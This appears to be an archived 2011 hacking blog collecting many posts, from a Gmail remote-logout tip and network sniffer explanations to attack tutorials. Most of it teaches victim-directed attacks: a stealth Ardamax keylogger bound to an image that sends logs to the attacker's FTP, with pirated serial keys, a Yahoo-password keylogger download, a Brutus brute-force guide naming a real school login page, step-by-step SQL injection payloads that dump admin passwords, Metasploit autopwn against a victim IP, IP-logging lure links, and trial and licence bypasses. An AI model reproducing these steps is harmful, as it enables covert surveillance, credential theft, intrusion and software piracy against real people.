Saturday, January 8, 2011

How To Sign Out of Gmail Account Remotely ?

Sign Out of Gmail Account Remotely
Gmail is one of the widely use email service.There are lot of features in gmail. There is a security feature for gmail known as remote logout. Many of use more than one computers to login to gmail account. Some times we often leave the browser opened & not being logged out of gmail or we are in cyber cafe and any power cut or computer faliure occurs and  if the computer is at office or any public place your account may be hacked or misused by someone else.
But there is a method by which you can l;og out from your gmail account remotely.
Open you gmail account and go to bottom of the page ,there you will see something as shown below..
gmail-remote-logout
gmail-remote-logout
Now you can click on “Details”  which shows you a pop-up having details about your last sessions.Click on “Sign out all other sessions” to sign out of gmail at all other places exept the current.
By this simple feature you can check that your gmail account is hacked or not.

How to Get Someone's IP Through AIM/MSN/Chat ?

Found a great website that logs IPs and gives you the lat/long./isp.
1)Create Account
http://www.chatrack.frihost.net/index-1.php
2)Get one of the links and tell someone on AIM or whatever to click it, choose any of the images and tell them you painted it or some stupid shit like that.
3)When they look at the image, it logs their IP.
4)Bonus points:
-Tell them its animated and 20 seconds in it will change, this allows the website to have time to ensure all their info is retrieved.
........................................................................................................................................................................................

How To Get A Facebook Email Address ?

How to Get Facebook Email Address
Facebook has just new features in which it will give email addresses to users ,at this time facebook email id is not open to everyone ,you have to request invittation.In order to get a invite to this new service you need to visit following  link where in you would be asked to click on the ‘Request Invite’ button.
http://www.facebook.com/about/messages/

Facebook-email-address-Invite
Facebook-email-Invite
if you are lucky you will get the yourname@facebook.com email id as soon as possible .Please note that Your email address will match your public username, for example:
Profile: facebook.com/username
Then your email address will be
Email: username@facebook.com
If you don’t have a username you can go here facebook.com/username/ to get or click below
http://www.facebook.com/username/

Ardamax 2.8 Key+ tutorial

Screen Shot Of Version 2.6
Ardamax 2.8 + tutorial

Ardamax Keylogger 2.9 is good, but not as good as Ardamax Keylogger 2.8, reason being is because on Ardamax Keylogger 2.9, when your victim clicks the file, it comes up saying "This will install Ardamax monitoring tool, do you wish to continue?", where as if you use Ardamax 2.8, it will just infect they're PC when they click it, nothing comes up, it'll just auto-install.

I. Get Ardamax 2.8:



1. Once you've downloaded it, you'll see a little notepad icon in your taskbar, now right-hand click it and click 'Enter registration key...', now type in this where it says registration name and under it where it says

Once done click 'Ok' and you should get a pop-up saying 'Registration key accepted. Thanks for registering'

II. Creating the Keylogger Engine:

2. Now your going to make the Keylogger Engine (The thing you give to your victim). Click 'Remote Installation...', now, click 'next' until you get to Appearences.

3. Now that your at Appearences, click 'Additional components' and un-tick 'Log Viewer' like done in the screenshot

4. Now you should be at 'Invisibility', make sure all the boxes are ticked, then click 'Next'.

5. Now you should be at 'Security', now, click 'Enable' and put your password (it can be any password you like, make it something easy so you can remember). Once done, make sure all the boxes are ticked and click 'Next'.

6. Now you should be at 'Web Update', just click 'Next' when your here.

7. Ok, you should now be at 'Options', this all depends on you, if you want your Keylogger to be a secret on your computer so your family know you ain't been up to anything naughty, then tick 'Start in hidden mode' and click 'Next'
(Remember, if in future you want to make a new Keylogger Engine, then press: CTRL + SHIFT + ALT + H at the same time.

8. Ok, now you should be at 'Control', click the box that says 'Send logs every', now make it so it sends logs every 30 minutes, then where it says Delivery, un-tick 'Email' and tick 'FTP', leave the 'Include' bit as it is, now un-tick the box where it says 'Send only if log size exceeds', once thats done, it should all look like it does in this screenshot:

cont: Now you should be at 'FTP', create a free account at http://www.drivehq.com/secure/FreeSignup...m=storage, then make sure your at 'Online Storage', then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says 'FTP Host:', put this:

http://ftp.drivehq.com

Now where it says 'Remote Folder:', put this: Logs

Now where it says 'Userame:' and 'Password:', put your DriveHQ username and password, then it should look something like this

Once done, do NOT change your DriveHQ password or rename/delete the folder called 'Logs', if you do, the logs will not come through.

9. You should now be at 'Control', make sure all the boxes are 'ticked' then click 'Next'.

10. Where it says 'Screen Shots', adjust them as you like, but I recommend every 2 hours and full screen, once done click 'Next'.

11. Now you should be at 'Destination', now you have to choose where you put your Keylogger Engine, where it says 'Keylogger egine path:', click 'browse' and choose where you want to put your Keylogger Engine.

12. Now un-tick 'Open the folder containing the keylogger engine' (this should stop you from logging yourself) and then choose the Icon you want for the keylogger engine, choose one and then click 'Next' then 'Finish'.

III. Binding the Keylogger Engine with another file:

13. Download Easy Binder 2.0

Download:

RapidShare: 1-CLICK Web hosting - Easy Filehosting

RapidShare: 1-CLICK Web hosting - Easy Filehosting

PLEASE NOTE THAT YOU WILL NEED THE .NET FRAMEWORK v2.0 IN ORDER TO RUN THE BINDER GET IT HERE:
x64:

http://www.Mcft.com/downloads/details.as...laylang=en

x86:

http://www.Mcft.com/downloads/details.as...laylang=en

14. Open it and then click the little green '+' image in the bottom left corner, then it should browse your files, go to wherever you put the Keylogger Engine and then click the file called 'Install'.

15. Do the same again but don't add the Keylogger Engine (Install), add a picture or something.

16. You need to get a .ico image, this is easy, just go to FavIcon from Pics -- how to create a favicon.ico for your website and upload the Image you want to be converted to .ico, once its done, click 'download'.

17. On the Binder, click 'Settings' and then where it says 'Select An Icon', click the '...' image and then browse your files, where it says 'Files of type', scroll down and select 'All Files [*.*]', then select your .ico image which you just made like so:

18. Now on the Easy Binder, where it says 'Set Output File', click the '...' button and then put it where you want your binded files to be saved, put the name you want on the file and then click 'Save'.

19. Go to 'File's' on the Binder and then click 'Bind File's'. Now this new file you've just made is the keylogger and a image in one, if your doing this with Ardamax 2.8 then when your victim opens the file, a harmless image comes up and they're PC also gets infected with Ardamax Keylogger.

Now spred and enjoy your logs!

Well have fun with it.

http://www.Serials.ws
 
Key: TVOGVGCPMUFCORA OR Name: Ziggy - SnD Team Serial: POFLCUHWBWAVYKL OR e37843hr73h74rhu OR UCCCBXOPYOMXACN OR TUQTNNQUOUPPQUQ

Wednesday, January 5, 2011

Sniffers - Tool and Softwares: Network Sniffers


Tool: Windump

  • WinDump is the porting to the Windows platform of tcpdump, the most used network sniffer/analyzer for UNIX.

WinDump is the porting to the Windows platform of tcpdump, the most prolific network sniffer/analyzer for UNIX. Porting is currently based on version 3.5.2. WinDump is fully compatible with tcpdump and can be used to watch and diagnose network traffic according to various complex rules.

WinDump is simple to use and works at the command prompt level. The syntax that we have used as seen in our screenshot here, is Windump -n -S -vv. The -n option tells Windump to display IP addresses instead of the computers' names. The -S option indicates that the actual TCP/IP sequence numbers should be shown. If this option is omitted, relative numbers will be shown. The -vv options make the output more verbose, adding fields such as time to live and IP ID number to the sniffed information.
Let's take a closer look at how WinDump records various types of packets. Here's a TCP example, which shows a data packet with the PUSH and ACK flags set. First, we have the WinDump log entry for the packet. Immediately after it is the same entry, but with an explanation added for each field:
20:50:00.037087 IP (tos 0x0, ttl 128, id 2572, len 46) 192.168.2.24.1036 > 64.12.24.42.5190: P [tcp sum ok] 157351:157357(6) ack 2475757024 win 8767 (DF)
The above entry can be deciphered as 20:50:00.037087 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 2572, len 46) 192.168.2.24.1036 [source IP:port] > 64.12.24.42.5190: [destination IP:port] P [push flag] [tcp sum ok] 157351:157357 [sequence numbers] (6) [bytes of data] ack 2475757024 [acknowledgement and sequence number] win 8767 [window size] (DF) [don't fragment set]
The next example is UDP.
20:50:11.190427 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 6071, len 160) 192.168.2.28.3010 [source IP:port] > 192.168.2.1.1900: [destination IP:port] udp [protocol] 132
ICMP log entry looks as given below.
20:50:11.968384 [timestamp] IP [protocol header follows] (tos 0x0, ttl 128, id 8964, len 60) 192.168.2.132 [source IP] > 192.168.2.1: [destination IP] icmp [protocol type] 40: [Time to live] echo request seq 43783 [sequence number]
Finally, WinDump will also capture ARP requests and replies.
20:50:37.333222 [timestamp] arp [protocol] who-has 192.168.2.1 [destination IP] tell 192.168.2.118 [source IP]
20:50:37.333997 [timestamp] arp [protocol] reply 192.168.2.1 [destination IP] is-at 0:a0:c5:4b:52: fc [MAC address]

Sniffers - Tool and Softwares: Network Sniffers

There are three main modes in which Snort can be configured: sniffer, packet logger, and network intrusion detection system.
  • Sniffer mode simply reads the packets off of the network and displays them for you in a continuous stream on the console.
  • Packet logger mode logs the packets to the disk.
  • Network intrusion detection mode is the most complex and configurable configuration, allowing Snort to analyze network traffic for matches against a user defined rule set

The main distribution site for Snort is http://www.snort.org. Snort is distributed under the GNU GPL license by the author Martin Roesch. Snort is a lightweight network IDS, capable of performing real-time traffic analysis and packet logging on IP networks. It can perform protocol analysis, content searching/matching.

Snort logs packets in either tcpdump binary format or in Snort's decoded ASCII format to logging directories that are named based on the IP address of the foreign host. In our lab, we start using Snort as a packet sniffer and a packet analyzer. Apart from running in a promiscuous mode, we will also see how it will help us log interesting IPs. Using Snort as a packet sniffer and packet analyzer is an easy process. The man pages are very helpful.
From the command line prompt we set Snort to a verbose display of the packets sniffed and analyzed. e.g. - The command given below captures all the packets belonging to the class C internal IP's of the type 192.168.20.*.
C:\>snort -v -d -e -i etho -h 192.168.20.0/24 -1 log
The '-v' switch brings forth a verbose response.
The '-d' switch helps in dumping the decoded application layer data
While '-e' shows the decoded Ethernet headers.
The '-i' switch specifies the interface to be monitored for packet analysis.
The '-h' switch specifies which class of network packets has to be captured.
The -l option tells snort to dump the packets in the log file.
The packets are captured in hex format by default (this can be changed to binary -b) and sorted by IP address to facilitate easy mapping and decoding of data.
06/22-16:36:44.959860 0:C1:26:E:AF:10 -> 0:A0:C5:4B:52:FC type:0x800 len:0x4D
192.168.2.96:1629 -> 203.124.250.69:53 UDP TTL:128 TOS:oxo ID:38429 IpLen:20 DgmLen:63
Len: 43
00 02 0100 00 00 01 00 00 00 00 00 00 03 77 77 77 .............www
09 61 69 72 6C 69 6E 65 72 73 03 6E 65 74 00 00 .airliners.net..
01 00 01 ...

Sniffers - Tool: Ethereal

Ethereal is a free network protocol analyzer for UNIX and Windows. It allows the user to examine data from a live network or from a capture file on disk. Interactive browsing of the captured data, viewing summary and detailed information for each packet are part of the basic functionality of the sniffer. Ethereal has several powerful features, including a display filter language and the ability to view the reconstructed stream of a TCP session.

Recent versions of Ethereal have included many enhancements to the interface. Live data can be read from Ethernet, FDDI, PPP, Token-Ring, IEEE 802.11, Classical IP over ATM, and loopback interfaces (at least on some platforms; not all of those types are supported on all platforms). Let us take a closer look. We run Ethereal over the LAN (which is not switched) and take a look at the captured data. We sort by the protocol and notice a POP session.
Ethereal lets us follow the entire conversation as shown in the screenshot below.


We are able to reconstruct the client-server conversation as displayed by two different colors. We are able to make out the email service provider, the user name and password from the reconstruction of the sniffed packets. That is not all. We were also able to pick a chat thread from the thousands of packets that passed by in the two minutes.

Sniffers - An Introduction

Introduction to Packet Sniffing
From Tony Bradley, CISSP, MCSE2k, MCSA, A+
Its a cruel irony in information security that many of the features that make using computers easier or more efficient and the tools used to protect and secure the network can also be used to exploit and compromise the same computers and networks. This is the case with packet sniffing.
A packet sniffer, sometimes referred to as a network monitor or network analyzer, can be used legitimately by a network or system administrator to monitor and troubleshoot network traffic. Using the information captured by the packet sniffer an administrator can identify erroneous packets and use the data to pinpoint bottlenecks and help maintain efficient network data transmission.
In its simple form a packet sniffer simply captures all of the packets of data that pass through a given network interface.
Typically, the packet sniffer would only capture packets that were intended for the machine in question. However, if placed into promiscuous mode, the packet sniffer is also capable of capturing ALL packets traversing the network regardless of destination.
By placing a packet sniffer on a network in promiscuous mode, a malicious intruder can capture and analyze all of the network traffic. Within a given network, username and password information is generally transmitted in clear text which means that the information would be viewable by analyzing the packets being transmitted.
A packet sniffer can only capture packet information within a given subnet. So, its not possible for a malicious attacker to place a packet sniffer on their home ISP network and capture network traffic from inside your corporate network (although there are ways that exist to more or less "hijack" services running on your internal network to effectively perform packet sniffing from a remote location). In order to do so, the packet sniffer needs to be running on a computer that is inside the corporate network as well. However, if one machine on the internal network becomes compromised through a Trojan or other security breach, the intruder could run a packet sniffer from that machine and use the captured username and password information to compromise other machines on the network.
Detecting rogue packet sniffers on your network is not an easy task. By its very nature the packet sniffer is passive. It simply captures the packets that are traveling to the network interface it is monitoring. That means there is generally no signature or erroneous traffic to look for that would identify a machine running a packet sniffer. There are ways to identify network interfaces on your network that are running in promiscuous mode though and this might be used as a means for locating rogue packet sniffers.
If you are one of the good guys and you need to maintain and monitor a network, I recommend you become familiar with network monitors or packet sniffers such as Ethereal. Learn what types of information can be discerned from the captured data and how you can put it to use to keep your network running smoothly. But, also be aware that users on your network may be running rogue packet sniffers, either experimenting out of curiosity or with malicious intent, and that you should do what you can to make sure this does not happen.

Julian Assange the Hacker

Yeah you heard it right! The famous editor-in-chief of Wikileaks is a Hacker. Hacker in truer sense, he is one of the first hacker to implement ethical hacking.
Assange is a self-taught at libraries and learned to program on early PCs.
Programming quickly became hacking once Assange got an Internet connection, and soon he was accessing government networks and bank mainframes. He was arrested in 1991 and charged with more than 30 criminal counts related to his hacking. Facing as many as 10 years in prison, Assange struck a plea deal.
During sentencing, the judge ruled that Assange only had to pay a fine. Assange's hacks were not malicious; they were the harmless result of “inquisitive intelligence,” said the judge.

How to Know the IP address of a person on Facebook.


This technique works when you are chatting with that person. The first demand of operation is to close all of the website and Messengers that you are using, even clean History and delete Cookies as precaution. Now start chatting with that person.

The first thing you do is to open start->run->cmd.exe now in it type following command:

netstat –an

and wait and watch the foreign address will be the IP address

Another Way of getting Administrator right on XP

We all know that in colleges, offices, schools the administrator allocates user account for each individual. and of course this user account contains very less privileges. also admin blocks us from accessing certain services such as internet or blocks certain ports such as USB port. But did you can get all the administrative privileges (rights) to your user account?. .Yes you can.
So lets see. There is a software called Windows NT password recovery which can used to reset the password for any account in Windows. This software is also bootable from CD. that means if you have CD drive in your system, you can use this software without installing it.
Follow the steps:
#1 Download the ISO image from here and burn a CD with this ISO image file.
#2 Boot your computer using this bootable CD created in step 1. You may need to set your CD-ROM as first boot device in BIOS in order to boot from it.
#3 Once you boot your computer with this CD, you will get a command based interface which is quite self-explanatory. On first screen, press enter key to boot in default mode.
#4 After you boot, it gives option, it will show the drive partitions and will give the choice, “Please select the partition number.” Press enter if windows is installed on C drive, else select the appropriate partition.
#5 Now it will ask ” What is path of Windows directory ?”, press enter for default value.
#6 Now it will show option “Select which part of registry to load” . Type 1 and press enter.
#7 This will show the list of users on the windows. Type the username of the user for which you want to gain administrative privileges (rights).
#8 Now it will show following choices
1. Clear the password
2. Edit password
3. Promote user
4. Unlock account
5. Quit
Type 3 and press enter.
#9 After you press enter, it will show a warning. Type y and press enter to continue.
#10 Now type ! and press enter to come to previous menu, here type q to quit and press enter.
#11 It will now say, About to write files, at this type y and press enter.
#12 It will ask to Run again. Now take the CD out of the tray and restart your computer.
Its Done! This user will have administrator rights next time you restart your windows PC

Albertino Keylogger

Here is another free Keylogger called Abertino.
You can download it from link below.


Call absolutely free to any country

Using this VOIP program, you can call landline numbers in any country for FREE."

FreeCall is still a Freeware app but you only get 300 minutes a week.
 
To bypass this restriction:

http://www.freecall.com/en/download.html
 


Keep the setup.exe. Freecall's protection system is quite flawed, when the program announces you cannot use any more minutes = Uninstall and reinstall and it will reset your 300 minutes which only takes a moment.
 

A)You MUST make an account with the program when it loads up. Then when your logged in (it will say at the bottom: 'The client is logged on')
 

B)Go to the dial pad TAB, ignore the on screen buttons, at the bottom type in your number and remember you need to add country codes at the beginning - NO spaces in the number either.
 

C) And it does do all countries for free - i've used it from NZ to england, USA, Spain and Aussie and they used it back.
 

D) If it didn't work, you need to check your firewall settings etc, this is an obvious but a program like this needs full access. .

Digital Keylogger v3.0 by Nytro download

Well I promised you people that I will post about free Keyloggers. Here is First of them. Use it responsibly, but there is one problem with it, it is detected by antivirus. But still better than nothing

: Digital Keylogger v3.0 :::
:::: (c) Nytro 2008 ::::

Digital Keylogger v3.0 :

Made in Romania
Client size : 912 KB
Server size : 196 KB

New : Server captures all windows .
Server :

Copy file : C:\WINDOWS\system32\explorer.exe
Starup : Yes , SystemDriver
Disable Task Manager : No
Hidden Install : Yes
Icon : Yahoo! Messenger

No "Missing file error" for client and server .
Features :

- Get keylog Automat : You set how fast to recive the keylog from server .
- Get keylog Manual : Click "Get Keylog" to get the keylog from server .
- Close Y! : You will close victim's Yahoo! Messenger , the victim will login , and you will get his password . Server will disable "Remember ID & Password" and "Auto-Login" options if they are activated .
- Kill Server : The server will be deleted from victim's pc .
- Send Message : You can send a message to your victim . Message type will be critical , the title will be "Microsoft Windows" .
- Use Backspace : If you select Yes , if your victim press Backspace button , it will have an effect to your keylog . It will delete a char from keylog . If you select No , pressing Backsapce button , won't have any effect .
- Save Log : You can save the keylog to your PC .
- System Tray : The client will move to System Tray , behind the clock . Just move mouse over his icon to restore it .
Download :
http://www.netdrive.ws/48170.html

Brutus Tutorial on How to use it

 

How to use Brutus.

Written by: ALEX================================================== ========
I, The Author, take no responsibility for what you do with the information
that I am providing for you. This information is for educational purposes only.
================================================== ========

Chapter 1: Introduction to Brutus.

1.What is Brutus?

2.What can I do with it?

3 Where can I download Brutus?

4.Where can I find a good password list?


Chapter Two: Let's Get Cracking.

1.HTTP Form.

2.FTP.

3.POP3

4.Telnet.

5.SMB (Netbios)

6.Netbus

7.Custom.

Chapter Three: Wrapping up.

1.Contact Information.
========================================
Chapter One.

==What is Brutus?==

Brutus is a well known password brute forcing program.

==What can I do with it?==

With Brutus, you can brute force passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, and they also have a
"Custom" option so you can specify your own settings.

==Where can I download Brutus?==
You can find Brutus at it's webpage www.hoobie.net/brutus
You can also find it at GluTuk's site www.spartandownloads.2ys.com

==Where can I find a good password list to use with Brutus?==
Pretty much, the only password list you will ever need
and has 4.9 million passwords. Here are a link where you can download it.

Part 1.
http://area51archives.com/files/pass_list.rar

Part 2
http://area51archives.com/files/pass_list.rar

================================================== ============

Chapter Two: Let's Get Cracking.

Note: You can use a proxy for each cracking method.

==HTTP Form==

This is the option you would use if you want to crack into a website that has a field for a username and a pass, like
this one.

http://www.westbranch.k12.oh.us/staff/controls.asp

I will use this site for the rest ov this section as well.

First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put
the above link into the Target form field, then click Learn Form Settings
From here, you click the field name that is for the username, in this case it is userid, once you have selected it,
click the username button that is shown above the cookie information. That tells brutus that that field is for the username.
Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you
need to fill that in with the response you get when you try to enter a password into your site. In this case the response is
"You have entered a wrong Password or username." For this target we will put that into the Primary response field Once this
is done, we click ok, add the IP into the Target Field and start our crack.

==FTP==

For cracking an FTP server, the default settings should remain how they are, I usually make sure that the "Try to stay
connected for unlimited attempts" box is ticked. That’s up to you, once you have selected your options, enter the IP and
being the crack.

==POP3==

This is pretty much the same as FTP cracking as far as, the default settings should work for you. Once again, I like to
use the "Try to stay connected for unlimited attempts" option.

==Telnet==

Seems as if I'm repeating myself, but once again, the default settings should werk for you.

==SMB (NetBIOS)==

If you happen to find yourself a target that has the NetBIOS port open (139) and has sharing enabled, but needs a
password, this is what you would use. Once again, default settings should work.

==Sub7==

Sub7 is a popular Trojan that sometimes, you might find a server that needs a password to connect.
This option is used for, cracking a password protected Sub7 server.

==Custom==

This is what you would use to set up a crack for anything else that you could think ov.You need to find out what you need
to put in each field once you click "Define sequence" Those options will vary from target to target.

ARP Spoofing and Sniffing HTTPS and SSH

A possible way to sniff information would be to control an ARP table of a computer. ARP spoofing involves changing the MAC to IP address entries, causing traffic to be redirected from the legitimate system to an unauthorized system of the attacker's choice.
This is achieved by sending out a forged ARP packet to the target system, telling it that its default gateway has changed to the attacker's system. This way, whenever the target system sends traffic on the network, it will send it to the attacker's system first, which then forwards the packet on to its original destination as if nothing ever happened.



Attack Methods
Let us take a closer look at the attack methodology. There are switches that are not foiled by MAC flooding. These switches stop storing new MAC addresses once their memory reaches a given limit. In this scenario, an attacker can use DSniff's tool called arpspoof. arpspoof allows an attacker to manipulate ARP traffic on a LAN by redefining the ARP table.


Usually, such attempts are preceded by the scanning and enumeration phases where
the attacker draws up a map of the network and discovers the network topology. Looking at the network topology the attacker can decipher the IP address of the default router for the LAN. He then sets up the attack by configuring the IP layer of the attacker's machine to forward any packet it receives from the LAN to the IP address of the default router (IP forwarding). The next step in the attack is sending the fake ARP replies to the victim's machine.
This ARP changes the victims ARP table by remapping the default router's IP (layer 3) to attacker own MAC address (layer2). The victim machine sends the data, forwarding it to what it thinks is the default router (but unknowingly using the attackers MAC address).
The attacker sniffs the information using any kind of sniffing tool. The attacker's machine will promptly forward the victim's traffic to default router on the LAN. Upon reaching the default router the traffic is transmitted to the outside world. The attacker is now sniffing in a switched environment

What is Buffer Overflow?

When ever a program is compiled there is space given for the input to the program. The input’s size is defined at the time of programming. So we can take a example as if I have coded a program for asking a input of 8 bytes (1 byte = 1 letter) and someone inputs 9 byte answer, the result would be called BUFFER OVERFLOW. In Hacking scene exploits are written for these vulnerabilities and by using this exploit they execute the Payload and take control of the machine

How to run a trial software forever

In this post I’ll show you how to hack a Software and run the trial program forever. Most of us are familiar with many softwares that run only for a specified period of time in the trial mode. Once the trial period is expired these softwares stop functioning and demand for a purchase. But there is a way to run the softwares and make them function beyond the trial period. Isn’t this interesting?
Before I tell you how to hack the software and make it run in the trial mode forever, we have to understand the functioning of these softwares. I’ll try to explain this in brief.
When these softwares are installed for the first time, they make an entry into the Windows Registry with the details such as Installed Date and Time, installed path etc. After installation every time you run the software, it compares the current system date and time with the installed date and time. So, with this it can make out whether the trial period is expired or not.
So with this being the case, just manually changing the system date to an earlier date will not solve the problem. For this purpose there is a small Tool known as RunAsDate.
RunAsDate is a small utility that allows you to run a program in the date and time that you specify. This utility doesn’t change the current system date, but it only injects the date/time that you specify into the desired application.
RunAsDate intercepts the kernel API calls that returns the current date and time (GetSystemTime, GetLocalTime, GetSystemTimeAsFileTime), and replaces the current date/time with the date/time that you specify. It works with Windows 2000, XP, 2003 and Vista.
NOTE: FOLLOW THESE TIPS CAREFULLY
You have to follow these tips carefully to successfully hack a software and make it run in it’s trial mode forever.
1. Note down the date and time, when you install the software for the first time.
2. Once the trial period expires, you must always run the software using RunAsDate.
3. After the trial period is expired, do not run the software(program) directly. If you run the software directly even once, this hack may no longer work.
4. It is better and safe to inject the date of the last day in the trial period.
For example, if the trial period expires on jan 30 2009, always inject the date as jan 29 2009 in the RunAsDate. I hope this helps! Please express your experience and opinions through comments

How to hack a computer with Nmap and Metasploit

I have written different hacking articles about Nmap and Metasploit. Now I am writing this article to teach how to hack a computer using these two great tools.

Just got to http://www.metasploit.com/ and download the Latest Framework (not the mini version).

Now open the metasploit console. And type the following commands:

1: db_create (this will create database needed for this attack)
2: TYPE nmap -sT –sV XXX.XXX.XXX.XXX( X be the IP address of victim)
Now give it time to scan and when it is complete type following command.
3: db_autopwn -p -t –e

This would start the penetration test and great thing about this is that it does not need any manual configuration. Every thing will be done automatically and if the test is successful a shell will be created.

How to Hack a computer using Metasploit ?

Metasploit is one of the greatest Hacking tools ever. It makes the hacking easy for the Script Kiddies (new hackers). But Question comes How to use it to hack a computer?

Metasploit Framework comes in command-line as well as GUI version. This article will deal with the command-line version. Followings are the basic commands of Metasploit that you should Learn by Heart.

1: help (show the commands.)
2: show info XXXX (to show the information on specified XXXX value, that is can be exploit or payload)
3: show options ( to show the options for a exploit and payload. Like RHOST, LHOST)
4: show exploits/payloads (to get a list of exploits/payloads)
5: use XXXX (to select the name of the exploit.)
6: set XXXX (to set the value of RHOST, LHOST or payload)
7: exploit (to launch a exploit on targeted machine.)

Note: To hack a computer using Metasploit first you should have the enough information of the target ­­including
1: IP address
2: Open Ports
3: services running
4: Version of software running

All of these need a little work. A famous tool to do all of these is NMAP on which I have written some articles.

Now the first step is choosing a right exploit for the vulnerabilities in the machine. To determine the exploit for the attack you need all the things noted above. For example the computer is running a SMTP server on Port 25 and there is a exploit on it than you hack that computer.

To choose an exploit following command is there:

Use [exploits address . e.g. Exploit/windows/smtp/xxx. ]

Now you need a payload (payload is a piece of program that will be executed if vulnerability is exploited). To get a list of all the payloads available for the exploit Just type following command.

Show payloads

Now choose an appropriate a payload from it. The only thing left is to set the fields for the attack. List of Most Probable fields to be set is given bellow.

RHOST = The IP address of the computer to be attacked.
RPORT = The Port of the service to exploited (it set by default)
LHOST = The IP address of your computer (it set by default)
LPORT = The default port of your Metasploit program (it set by default)

Now the Last step is to type the following command and Launch attack to the computer.

exploit

After typing this command the attack will be launched and if vulnerability is successfully exploited the payload will be executed and a shell (you can take it as command prompt) will be launched which will allow you to do anything with the computer that you have attacked.

The Difference Between a DoS and a DDoS Attack

DoS = Denial Of Service
DDoS = Distributed Denial Of Service

What is the difference between the two?
Whilst DoS and DDoS sound remarkably similar there are in fact differences between the two -

DoS

A DoS Attack is a Denial of Service attack.
This means that one computer and one internet connection is used to flood a server with packets (TCP / UDP).
The point of such a denial of service attack is to overload the targeted server’s bandwidth and other resources.
This will make the server inaccessible to others, thereby blocking the website or whatever else is hosted there.

DDoS

A DDoS Attack is a Distributed Denial of Service Attack.
In most respects it is similar to a DoS attack but the results are much, much different.
Instead of one computer and one internet connection the DDoS attack utilises many computers and many connections.
The computers behind such an attack are often distributed around the whole world and will be part of what is known as a botnet.
The main difference between a DDoS attack vs a DoS attack, therefore, is that the target server will be overload by hundreds or even thousands of requests in the case of the former as opposed to just one attacker in the case of the latter.
Therefore it is much, much harder for a server to withstand a DDoS attack as opposed to the simpler DoS incursion.

How are Websites Hacked by SQL injection

Learn How To Hack Websites , Mysql Injection Tutorial
SQL Injection in MySQL Databases
SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step  1:

When testing a website for SQL Injection vulnerabilities, you need to find a page that looks like this:
www.site.com/page=1

or
www.site.com/id=5


Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/page=1'
If the database is vulnerable, the page will spit out a MySQL error such as;

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/wwwprof/public_html/readnews.php on line 29

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.



Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

www.site.com/page=1 order by 1--
http://www.site.com/page=1 order by 2--
http://www.site.com/page=1 order by 3--
http://www.site.com/page=1 order by 4--
http://www.site.com/page=1 order by 5--

If we receive another MySQL error here, then that means we have 4 columns. If the site errored on "order by 9" then we would have 8 columns. If this does not work, instead of -- after the number, change it with /*, as they are two difference prefixes and if one works the other tends not too. It just depends on the way the database is configured as to which prefix is used.

Step 3


We now are going to use the "union" command to find the vulnerable columns. So we enter after the url, union all select (number of columns)--,
for example:
www.site.com/page=1 union all select 1,2,3,4--

This is what we would enter if we have 4 columns. If you have 7 columns you would put,union all select 1,2,3,4,5,6,7-- If this is done successfully the page should show a couple of numbers somewhere on the page. For example, 2 and 3. This means columns 2 and 3 are vulnerable.

Step 4

We now need to find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()
database()
version()
or if these dont work try...
@@user
@@version
@@database


For example the url would look like:
www.site.com/page=1 union all select 1,user(),version(),4--

The resulting page would then show the database user and then the MySQL version. For example admin@localhost and MySQL 5.0.83.
IMPORTANT: If the version is 5 and above read on to carry out the attack, if it is 4 and below, you have to brute force or guess the table and column names, programs can be used to do this.

Step 5

In this step our aim is to list all the table names in the database. To do this we enter the following command after the url.
UNION SELECT 1,table_name,3,4 FROM information_schema.tables--
So the url would look like:
www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as passwords, so look for admin tables or member or user tables.

Step 6
In this Step we want to list all the column names in the database, to do this we use the following command:

union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--

So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_schema=database()--
This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user,email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,
union all select 1,2,group_concat(username,0x3a,password),4 from admin--
So the url would look like this:
www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you dont have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website

List of some Google Syntax for search

Calculator:
The next time you need to do a quick calculation, instead of bringing up the Calculator applet, you can just type your expression in to Google.
Example:
48512 * 1.02

Word Definitions:
If you need to quickly look up the definition of a word or phrase, simply use the “define:” command.
Example:
define:internet

intitle:
This Syntax restricts your search to the titles of web pages. The variation allintitle: finds pages wherein all the words specified appear in the title of the web page. Using allintitle: is basically the same as using the intitle: before each keyword.
examples:
intitle:”george bush”
allintitle:”money supply” economics

You may wish to avoid the allintitle: variation, because it doesn’t mix well with some of the other syntax elements.

intext:
This Syntax searches only body text (i.e., ignores link text, URLs, and titles). While its uses are limited, it’s perfect for finding query words that might be too common in URLs or link titles.
examples:
Intext:” hackthenet.blogspot.com”
Intext:html

There’s also an allintext: variation, but again, this doesn’t play well with others.

inanchor:
This Syntax searches for text in a page’s link anchors. A link anchor is the descriptive text of a link. For example, the link anchor in the HTML code
example:
inanchor:” hackthenet.blogspot.com ″
As with other in*: syntax elements, there’s an allinanchor: variation, which works in a similar way (i.e., all the keywords specified must appear in a page’s link anchors).

Link:
Lets you see which pages are linking to your Web page or to another page you’re interested in.
example:
link:http:// hackthenet.blogspot.com

site:
This Syntax allows you to narrow your search by either a site or a top-level domain.
examples:
